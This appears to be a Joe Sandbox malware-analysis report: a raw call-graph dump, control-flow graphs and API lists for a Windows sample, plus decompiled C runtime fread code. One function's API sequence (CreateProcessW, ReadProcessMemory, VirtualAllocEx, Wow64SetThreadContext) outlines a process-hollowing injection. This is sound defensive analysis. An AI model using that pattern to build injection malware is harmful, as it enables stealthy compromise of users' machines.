_free 58 API calls 7564->7569 7565->7561 7570 13b4831 _free 58 API calls 7565->7570 7565->7586 7571 13b4831 _free 58 API calls 7566->7571 7567 13b72aa 7572 13b4831 _free 58 API calls 7567->7572 7573 13b4831 _free 58 API calls 7568->7573 7575 13b71ca 7569->7575 7576 13b7197 7570->7576 7571->7580 7578 13b72b0 7572->7578 7579 13b7217 7573->7579 7581 13b71b5 7574->7581 7582 13b4831 _free 58 API calls 7575->7582 7577 13b8c12 ___free_lconv_mon 58 API calls 7576->7577 7577->7561 7578->7553 7583 13b4831 _free 58 API calls 7579->7583 7580->7567 7584 13b4831 58 API calls _free 7580->7584 7585 13b8d0e ___free_lconv_num 58 API calls 7581->7585 7582->7586 7583->7558 7584->7580 7585->7564 7586->7558 7586->7559 7587->7556 7591 13b4599 LeaveCriticalSection 7588->7591 7590 13b4fc1 7590->7542 7591->7590 7593 13b1ffb LeaveCriticalSection 7592->7593 7594 13b1fdc 7592->7594 7593->7134 7594->7593 7595 13b1fe3 7594->7595 7598 13b4599 LeaveCriticalSection 7595->7598 7597 13b1ff8 7597->7134 7598->7597 7600 13b14a4 __initptd 7599->7600 7601 13b14e7 7600->7601 7603 13b14df __initptd 7600->7603 7607 13b14ba _memset 7600->7607 7612 13b1f5e 7601->7612 7603->7082 7605 13b1cc3 __cftog_l 58 API calls 7608 13b14d4 7605->7608 7607->7605 7610 13b1e89 __cftog_l 9 API calls 7608->7610 7610->7603 7613 13b1f6e 7612->7613 7614 13b1f90 EnterCriticalSection 7612->7614 7613->7614 7616 13b1f76 7613->7616 7615 13b14ed 7614->7615 7618 13b12b8 7615->7618 7617 13b442f __lock 58 API calls 7616->7617 7617->7615 7619 13b12d3 _memset 7618->7619 7625 13b12ee 7618->7625 7620 13b12de 7619->7620 7619->7625 7629 13b132e 7619->7629 7621 13b1cc3 __cftog_l 58 API calls 7620->7621 7622 13b12e3 7621->7622 7623 13b1e89 __cftog_l 9 API calls 7622->7623 7623->7625 7632 13b1521 7625->7632 7626 13b143f _memset 7630 13b1cc3 __cftog_l 58 API calls 7626->7630 7629->7625 7629->7626 7635 13b2873 7629->7635 7642 13b2a2a 7629->7642 7710 13b2752 7629->7710 7730 13b2897 7629->7730 7630->7622 7633 13b1fcd __wfsopen 2 API calls 7632->7633 7634 13b1527 7633->7634 7634->7603 7636 13b287d 7635->7636 7637 13b2892 7635->7637 7638 13b1cc3 __cftog_l 58 API calls 7636->7638 7637->7629 7639 13b2882 7638->7639 7640 13b1e89 __cftog_l 9 API calls 7639->7640 7641 13b288d 7640->7641 7641->7629 7643 13b2a4b 7642->7643 7644 13b2a62 7642->7644 7645 13b1c8f __write 58 API calls 7643->7645 7646 13b319a 7644->7646 7649 13b2a9c 7644->7649 7648 13b2a50 7645->7648 7647 13b1c8f __write 58 API calls 7646->7647 7650 13b319f 7647->7650 7651 13b1cc3 __cftog_l 58 API calls 7648->7651 7652 13b2aa4 7649->7652 7658 13b2abb 7649->7658 7653 13b1cc3 __cftog_l 58 API calls 7650->7653 7690 13b2a57 7651->7690 7654 13b1c8f __write 58 API calls 7652->7654 7655 13b2ab0 7653->7655 7656 13b2aa9 7654->7656 7657 13b1e89 __cftog_l 9 API calls 7655->7657 7660 13b1cc3 __cftog_l 58 API calls 7656->7660 7657->7690 7659 13b2ad0 7658->7659 7662 13b2aea 7658->7662 7663 13b2b08 7658->7663 7658->7690 7661 13b1c8f __write 58 API calls 7659->7661 7660->7655 7661->7656 7662->7659 7665 13b2af5 7662->7665 7664 13b48b1 __malloc_crt 58 API calls 7663->7664 7666 13b2b18 7664->7666 7667 13b6c34 __write_nolock 58 API calls 7665->7667 7668 13b2b3b 7666->7668 7669 13b2b20 7666->7669 7670 13b2c09 7667->7670 7673 13b7054 __lseeki64_nolock 60 API calls 7668->7673 7671 13b1cc3 __cftog_l 58 API calls 7669->7671 7672 13b2c82 ReadFile 7670->7672 7677 13b2c1f GetConsoleMode 7670->7677 7674 13b2b25 7671->7674 7675 13b3162 GetLastError 7672->7675 7676 13b2ca4 7672->7676 7673->7665 7680 13b1c8f __write 58 API calls 7674->7680 7681 13b316f 7675->7681 7682 13b2c62 7675->7682 7676->7675 7685 13b2c74 7676->7685 7678 13b2c7f 7677->7678 7679 13b2c33 7677->7679 7678->7672 7679->7678 7683 13b2c39 ReadConsoleW 7679->7683 7680->7690 7684 13b1cc3 __cftog_l 58 API calls 7681->7684 7687 13b1ca2 __dosmaperr 58 API calls 7682->7687 7693 13b2c68 7682->7693 7683->7685 7686 13b2c5c GetLastError 7683->7686 7688 13b3174 7684->7688 7692 13b2f46 7685->7692 7685->7693 7695 13b2cd9 7685->7695 7686->7682 7687->7693 7689 13b1c8f __write 58 API calls 7688->7689 7689->7693 7690->7629 7691 13b4831 _free 58 API calls 7691->7690 7692->7693 7700 13b304c ReadFile 7692->7700 7693->7690 7693->7691 7696 13b2d45 ReadFile 7695->7696 7702 13b2dc6 7695->7702 7697 13b2d66 GetLastError 7696->7697 7708 13b2d70 7696->7708 7697->7708 7698 13b2e83 7704 13b2e33 MultiByteToWideChar 7698->7704 7705 13b7054 __lseeki64_nolock 60 API calls 7698->7705 7699 13b2e73 7703 13b1cc3 __cftog_l 58 API calls 7699->7703 7701 13b306f GetLastError 7700->7701 7709 13b307d 7700->7709 7701->7709 7702->7693 7702->7698 7702->7699 7702->7704 7703->7693 7704->7686 7704->7693 7705->7704 7706 13b7054 __lseeki64_nolock 60 API calls 7706->7708 7707 13b7054 __lseeki64_nolock 60 API calls 7707->7709 7708->7695 7708->7706 7709->7692 7709->7707 7711 13b275d 7710->7711 7716 13b2772 7710->7716 7712 13b1cc3 __cftog_l 58 API calls 7711->7712 7714 13b2762 7712->7714 7713 13b276d 7713->7629 7715 13b1e89 __cftog_l 9 API calls 7714->7715 7715->7713 7716->7713 7717 13b27a7 7716->7717 7777 13b65a7 7716->7777 7719 13b2873 __filbuf 58 API calls 7717->7719 7720 13b27bb 7719->7720 7744 13b2916 7720->7744 7722 13b27c2 7722->7713 7723 13b2873 __filbuf 58 API calls 7722->7723 7724 13b27e5 7723->7724 7724->7713 7725 13b2873 __filbuf 58 API calls 7724->7725 7726 13b27f1 7725->7726 7726->7713 7727 13b2873 __filbuf 58 API calls 7726->7727 7728 13b27fe 7727->7728 7729 13b2873 __filbuf 58 API calls 7728->7729 7729->7713 7731 13b28a6 7730->7731 7740 13b28a2 _memmove 7730->7740 7732 13b28ad 7731->7732 7735 13b28c0 _memset 7731->7735 7733 13b1cc3 __cftog_l 58 API calls 7732->7733 7734 13b28b2 7733->7734 7736 13b1e89 __cftog_l 9 API calls 7734->7736 7737 13b28ee 7735->7737 7738 13b28f7 7735->7738 7735->7740 7736->7740 7739 13b1cc3 __cftog_l 58 API calls 7737->7739 7738->7740 7742 13b1cc3 __cftog_l 58 API calls 7738->7742 7741 13b28f3 7739->7741 7740->7629 7743 13b1e89 __cftog_l 9 API calls 7741->7743 7742->7741 7743->7740 7745 13b2922 __initptd 7744->7745 7746 13b292f 7745->7746 7749 13b2946 7745->7749 7747 13b1c8f __write 58 API calls 7746->7747 7751 13b2934 7747->7751 7748 13b2a0a 7750 13b1c8f __write 58 API calls 7748->7750 7749->7748 7752 13b295a 7749->7752 7753 13b297d 7750->7753 7754 13b1cc3 __cftog_l 58 API calls 7751->7754 7755 13b2978 7752->7755 7756 13b2985 7752->7756 7761 13b1cc3 __cftog_l 58 API calls 7753->7761 7768 13b293b __initptd 7754->7768 7757 13b1c8f __write 58 API calls 7755->7757 7758 13b2992 7756->7758 7759 13b29a7 7756->7759 7757->7753 7762 13b1c8f __write 58 API calls 7758->7762 7760 13b6c88 ___lock_fhandle 59 API calls 7759->7760 7763 13b29ad 7760->7763 7764 13b299f 7761->7764 7765 13b2997 7762->7765 7766 13b29d3 7763->7766 7767 13b29c0 7763->7767 7771 13b1e89 __cftog_l 9 API calls 7764->7771 7769 13b1cc3 __cftog_l 58 API calls 7765->7769 7772 13b1cc3 __cftog_l 58 API calls 7766->7772 7770 13b2a2a __read_nolock 70 API calls 7767->7770 7768->7722 7769->7764 7773 13b29cc 7770->7773 7771->7768 7774 13b29d8 7772->7774 7780 13b2a02 7773->7780 7775 13b1c8f __write 58 API calls 7774->7775 7775->7773 7778 13b48b1 __malloc_crt 58 API calls 7777->7778 7779 13b65bc 7778->7779 7779->7717 7783 13b702e LeaveCriticalSection 7780->7783 7782 13b2a08 7782->7768 7783->7782 7787 13b1932 7784->7787 7786 13b17d9 7788 13b193e __initptd 7787->7788 7789 13b442f __lock 51 API calls 7788->7789 7790 13b1945 7789->7790 7791 13b19fe __cinit 7790->7791 7792 13b1973 DecodePointer 7790->7792 7807 13b1a4c 7791->7807 7792->7791 7794 13b198a DecodePointer 7792->7794 7800 13b199a 7794->7800 7796 13b1a5b __initptd 7796->7786 7798 13b19a7 EncodePointer 7798->7800 7799 13b1a43 7801 13b17a8 _doexit 3 API calls 7799->7801 7800->7791 7800->7798 7802 13b19b7 DecodePointer EncodePointer 7800->7802 7803 13b1a4c 7801->7803 7805 13b19c9 DecodePointer DecodePointer 7802->7805 7806 13b1a59 7803->7806 7812 13b4599 LeaveCriticalSection 7803->7812 7805->7800 7806->7786 7808 13b1a2c 7807->7808 7809 13b1a52 7807->7809 7808->7796 7811 13b4599 LeaveCriticalSection 7808->7811 7813 13b4599 LeaveCriticalSection 7809->7813 7811->7799 7812->7806 7813->7808 8496 13b8bc0 8497 13b8bcc __initptd 8496->8497 8498 13b8c03 __initptd 8497->8498 8499 13b442f __lock 58 API calls 8497->8499 8500 13b8be0 8499->8500 8501 13b73d6 __updatetlocinfoEx_nolock 58 API calls 8500->8501 8502 13b8bf0 8501->8502 8504 13b8c09 8502->8504 8507 13b4599 LeaveCriticalSection 8504->8507 8506 13b8c10 8506->8498 8507->8506 8330 13b4985 8331 13b4988 8330->8331 8334 13b7580 8331->8334 8345 13b49b3 DecodePointer 8334->8345 8336 13b7585 8341 13b7590 8336->8341 8346 13b49dc 8336->8346 8338 13b75b8 8340 13b187c _abort 58 API calls 8338->8340 8339 13b759a IsProcessorFeaturePresent 8342 13b75a5 8339->8342 8344 13b75c2 8340->8344 8341->8338 8341->8339 8343 13b1d2c __call_reportfault 7 API calls 8342->8343 8343->8338 8345->8336 8350 13b49e8 __initptd 8346->8350 8347 13b4a52 8348 13b4a2f DecodePointer 8347->8348 8354 13b4a61 8347->8354 8353 13b4a1e _siglookup 8348->8353 8349 13b4a19 8351 13b36f3 __getptd_noexit 58 API calls 8349->8351 8350->8347 8350->8348 8350->8349 8356 13b4a15 8350->8356 8351->8353 8357 13b4abf 8353->8357 8359 13b187c _abort 58 API calls 8353->8359 8366 13b4a27 __initptd 8353->8366 8355 13b1cc3 __cftog_l 58 API calls 8354->8355 8358 13b4a66 8355->8358 8356->8349 8356->8354 8361 13b442f __lock 58 API calls 8357->8361 8363 13b4aca 8357->8363 8360 13b1e89 __cftog_l 9 API calls 8358->8360 8359->8357 8360->8366 8361->8363 8362 13b4b2c EncodePointer 8364 13b4aff 8362->8364 8363->8362 8363->8364 8367 13b4b5d 8364->8367 8366->8341 8368 13b4b68 8367->8368 8369 13b4b61 8367->8369 8368->8366 8371 13b4599 LeaveCriticalSection 8369->8371 8371->8368

                                                        Executed Functions

                                                        Function 001103F8 Relevance: 10.7, APIs: 7, Instructions: 201filememoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1103f8-1104e3 GetPEB call 1107a4 * 7 call 110772 CreateFileW 17 1104e9-1104f3 0->17 18 1105cd 0->18 25 1105c9-1105cb 17->25 26 1104f9-110509 VirtualAlloc 17->26 19 1105cf-1105d3 18->19 20 1105d5-1105d7 19->20 21 1105fc-110600 19->21 23 1105d9 20->23 24 1105dd-1105e2 20->24 27 110602-110607 21->27 28 1105e4-1105e9 21->28 23->24 24->21 34 1105c4-1105c7 25->34 26->25 31 11050f-11051e ReadFile 26->31 32 110614-11061a 27->32 33 110609-110611 VirtualFree 27->33 29 1105f2-1105f4 28->29 30 1105eb-1105f0 28->30 36 1105f6-1105f8 29->36 37 1105fa 29->37 30->21 31->25 38 110524-110545 VirtualAlloc 31->38 33->32 34->19 36->21 37->21 39 1105c2 38->39 40 110547-11055c call 11070b 38->40 39->34 43 110593-1105a7 call 1107a4 40->43 44 11055e-110567 40->44 43->19 50 1105a9-1105ab 43->50 45 11056a-110591 call 11070b 44->45 45->43 51 1105b1-1105c0 VirtualFree 50->51 52 1105ad-1105ae CloseHandle 50->52 51->34 52->51
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001104DB
                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00110502
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00110519
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0011053D
                                                        • CloseHandle.KERNELBASE(00000000,?), ref: 001105AE
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 001105B9
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00110611
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                                        • String ID:
                                                        • API String ID: 721982790-0
                                                        • Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                        • Instruction ID: 23e7e3ec1d874543399889dcedba6982004996730a8fd7fdd46acb78cc4e355a
                                                        • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                        • Instruction Fuzzy Hash: AD619F34E00214ABCF19DBA4C984BEEBBB6AF98710F144129E545EB290DBB49DC1CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001111BE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 53 1111be-11126c call 1106f7 call 1107a4 * 7 70 11126f-111273 53->70 71 111275-111289 70->71 72 11128b-111298 70->72 71->70 73 11129b-11129f 72->73 74 1112a1-1112b5 73->74 75 1112b7-1112d3 73->75 74->73 77 1112d5-1112d8 75->77 78 1112dd-111307 CreateProcessW 75->78 79 111480-111481 77->79 81 111311-11132a 78->81 82 111309-11130c 78->82 84 111334-11134e ReadProcessMemory 81->84 85 11132c-11132f 81->85 82->79 86 111350-111353 84->86 87 111358-111361 84->87 85->79 86->79 88 111363-111372 87->88 89 11138b-1113ab VirtualAllocEx 87->89 88->89 90 111374-111381 call 110360 88->90 91 1113b5-1113cd call 110261 89->91 92 1113ad-1113b0 89->92 90->89 97 111383-111386 90->97 98 1113d7-1113db 91->98 99 1113cf-1113d2 91->99 92->79 97->79 100 1113e4-1113ee 98->100 99->79 101 1113f0-11141e call 110261 100->101 102 111425-111441 call 110261 100->102 105 111423 101->105 108 111443-111446 102->108 109 111448-111466 Wow64SetThreadContext 102->109 105->100 108->79 110 111468-11146b 109->110 111 11146d-111470 call 1101b2 109->111 110->79 113 111475-111477 111->113 114 111479-11147c 113->114 115 11147e 113->115 114->79 115->79
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00111302
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D
                                                        • API String ID: 963392458-2746444292
                                                        • Opcode ID: de44eb80b07b3cc25024ca8b06665abb1d1dc4947ad57d65267bb3f94c5156e7
                                                        • Instruction ID: 41f9b199263ca8a4ff87b00d05586a811bac635f1ece6d99b0d86e7d3a9efc9a
                                                        • Opcode Fuzzy Hash: de44eb80b07b3cc25024ca8b06665abb1d1dc4947ad57d65267bb3f94c5156e7
                                                        • Instruction Fuzzy Hash: 64A1F570E10109EFDB49DFA4C981BEEBBB5BF48744F204465EA16EB290D770AA81DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00110809 Relevance: 7.7, APIs: 5, Instructions: 191fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 116 110809-1109c6 call 1106f7 call 1107a4 * 10 CreateFileW 142 1109c8 116->142 143 1109ca-1109d9 116->143 144 110a30-110a31 142->144 146 1109db 143->146 147 1109dd-1109f3 VirtualAlloc 143->147 146->144 148 1109f5 147->148 149 1109f7-110a0b ReadFile 147->149 148->144 150 110a0d 149->150 151 110a0f-110a2d CloseHandle call 110a32 call 110e98 ExitProcess 149->151 150->144
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001109BC
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 47efa2f738dbac7ff5fd3ee764efba75c5530c771d0827437343daff64dab558
                                                        • Instruction ID: fd52e687362eedd8e61ac858e4a4c07ec91efa67575b98c20d31f47e947446e1
                                                        • Opcode Fuzzy Hash: 47efa2f738dbac7ff5fd3ee764efba75c5530c771d0827437343daff64dab558
                                                        • Instruction Fuzzy Hash: DB714B35E50348EADF55DBE4E912BEDB7B5AF88710F204426E109FB2E0DBB11A80DB05
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B12B8 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 156 13b12b8-13b12d1 157 13b12ee 156->157 158 13b12d3-13b12d8 156->158 160 13b12f0-13b12f6 157->160 158->157 159 13b12da-13b12dc 158->159 161 13b12de-13b12e3 call 13b1cc3 159->161 162 13b12f7-13b12fc 159->162 174 13b12e9 call 13b1e89 161->174 163 13b130a-13b130e 162->163 164 13b12fe-13b1308 162->164 167 13b131e-13b1320 163->167 168 13b1310-13b131b call 13b1530 163->168 164->163 166 13b132e-13b133d 164->166 172 13b133f-13b1342 166->172 173 13b1344 166->173 167->161 171 13b1322-13b132c 167->171 168->167 171->161 171->166 176 13b1349-13b134e 172->176 173->176 174->157 178 13b1437-13b143a 176->178 179 13b1354-13b135b 176->179 178->160 180 13b135d-13b1365 179->180 181 13b139c-13b139e 179->181 180->181 184 13b1367 180->184 182 13b1408-13b1409 call 13b2752 181->182 183 13b13a0-13b13a2 181->183 193 13b140e-13b1412 182->193 186 13b13c6-13b13d1 183->186 187 13b13a4-13b13ac 183->187 188 13b136d-13b136f 184->188 189 13b1465 184->189 196 13b13d3 186->196 197 13b13d5-13b13d8 186->197 194 13b13ae-13b13ba 187->194 195 13b13bc-13b13c0 187->195 190 13b1371-13b1373 188->190 191 13b1376-13b137b 188->191 192 13b1469-13b1472 189->192 190->191 198 13b143f-13b1443 191->198 199 13b1381-13b139a call 13b2897 191->199 192->160 193->192 200 13b1414-13b1419 193->200 201 13b13c2-13b13c4 194->201 195->201 196->197 197->198 202 13b13da-13b13e6 call 13b2873 call 13b2a2a 197->202 205 13b1455-13b1460 call 13b1cc3 198->205 206 13b1445-13b1452 call 13b1530 198->206 216 13b13fd-13b1406 199->216 200->198 204 13b141b-13b142c 200->204 201->197 217 13b13eb-13b13f0 202->217 211 13b142f-13b1431 204->211 205->174 206->205 211->178 211->179 216->211 218 13b1477-13b147b 217->218 219 13b13f6-13b13f9 217->219 218->192 219->189 220 13b13fb 219->220 220->216
                                                        C-Code - Quality: 69%
                                                        			E013B12B8(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E013B1530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E013B2752(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E013B1530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E013B1CC3())) = 0x22;
												L4:
												E013B1E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E013B2873(_t119)); // executed
											_t88 = E013B2A2A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E013B2897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E013B1CC3())) = 0x16;
				goto L4;
			}




























                                                        0x013b12c2
                                                        0x013b12c5
                                                        0x013b12cb
                                                        0x013b12ce
                                                        0x013b12d1
                                                        0x013b12ee
                                                        0x00000000
                                                        0x013b12ee
                                                        0x013b12d3
                                                        0x013b12d8
                                                        0x00000000
                                                        0x00000000
                                                        0x013b12dc
                                                        0x013b12f7
                                                        0x013b12fa
                                                        0x013b12fc
                                                        0x013b130a
                                                        0x013b130a
                                                        0x013b130e
                                                        0x013b1316
                                                        0x013b131b
                                                        0x013b131b
                                                        0x013b131e
                                                        0x013b1320
                                                        0x00000000
                                                        0x013b1322
                                                        0x013b1322
                                                        0x013b132a
                                                        0x013b132c
                                                        0x00000000
                                                        0x00000000
                                                        0x013b132e
                                                        0x013b1331
                                                        0x013b1334
                                                        0x013b133b
                                                        0x013b133d
                                                        0x013b1344
                                                        0x013b133f
                                                        0x013b133f
                                                        0x013b133f
                                                        0x013b1349
                                                        0x013b134c
                                                        0x013b134e
                                                        0x013b1437
                                                        0x00000000
                                                        0x013b1354
                                                        0x013b1354
                                                        0x013b1354
                                                        0x013b135b
                                                        0x013b139c
                                                        0x013b139c
                                                        0x013b139e
                                                        0x013b1409
                                                        0x013b140f
                                                        0x013b1412
                                                        0x013b1469
                                                        0x00000000
                                                        0x013b146f
                                                        0x013b1414
                                                        0x013b1417
                                                        0x013b1419
                                                        0x013b143f
                                                        0x013b143f
                                                        0x013b1443
                                                        0x013b144d
                                                        0x013b1452
                                                        0x013b145a
                                                        0x013b12e9
                                                        0x013b12e9
                                                        0x00000000
                                                        0x013b12e9
                                                        0x013b141b
                                                        0x013b141e
                                                        0x013b1421
                                                        0x013b1422
                                                        0x013b1425
                                                        0x013b1425
                                                        0x013b1426
                                                        0x013b1429
                                                        0x013b142c
                                                        0x00000000
                                                        0x013b142c
                                                        0x013b13a0
                                                        0x013b13a2
                                                        0x013b13c6
                                                        0x013b13cb
                                                        0x013b13d1
                                                        0x013b13d3
                                                        0x013b13d3
                                                        0x013b13a4
                                                        0x013b13a6
                                                        0x013b13ac
                                                        0x013b13be
                                                        0x013b13be
                                                        0x013b13be
                                                        0x013b13c0
                                                        0x013b13ae
                                                        0x013b13b3
                                                        0x013b13b5
                                                        0x013b13b5
                                                        0x013b13c2
                                                        0x013b13c2
                                                        0x013b13d5
                                                        0x013b13d8
                                                        0x00000000
                                                        0x013b13da
                                                        0x013b13da
                                                        0x013b13db
                                                        0x013b13e5
                                                        0x013b13e6
                                                        0x013b13eb
                                                        0x013b13ee
                                                        0x013b13f0
                                                        0x013b1477
                                                        0x00000000
                                                        0x013b1477
                                                        0x013b13f6
                                                        0x013b13f9
                                                        0x013b1465
                                                        0x013b1465
                                                        0x013b1465
                                                        0x013b1465
                                                        0x00000000
                                                        0x013b1465
                                                        0x013b13fb
                                                        0x013b13fb
                                                        0x013b13fd
                                                        0x013b13fd
                                                        0x013b1400
                                                        0x013b1403
                                                        0x00000000
                                                        0x013b1403
                                                        0x013b13d8
                                                        0x013b135d
                                                        0x013b1360
                                                        0x013b1363
                                                        0x013b1365
                                                        0x00000000
                                                        0x00000000
                                                        0x013b1367
                                                        0x00000000
                                                        0x00000000
                                                        0x013b136d
                                                        0x013b136f
                                                        0x013b1371
                                                        0x013b1373
                                                        0x013b1373
                                                        0x013b1376
                                                        0x013b1379
                                                        0x013b137b
                                                        0x00000000
                                                        0x013b1381
                                                        0x013b1388
                                                        0x013b138d
                                                        0x013b1390
                                                        0x013b1393
                                                        0x013b1396
                                                        0x013b1398
                                                        0x00000000
                                                        0x013b1398
                                                        0x013b142f
                                                        0x013b142f
                                                        0x013b142f
                                                        0x00000000
                                                        0x013b1354
                                                        0x013b134e
                                                        0x013b1320
                                                        0x013b1303
                                                        0x013b1306
                                                        0x013b1308
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b1308
                                                        0x013b12de
                                                        0x013b12e3
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
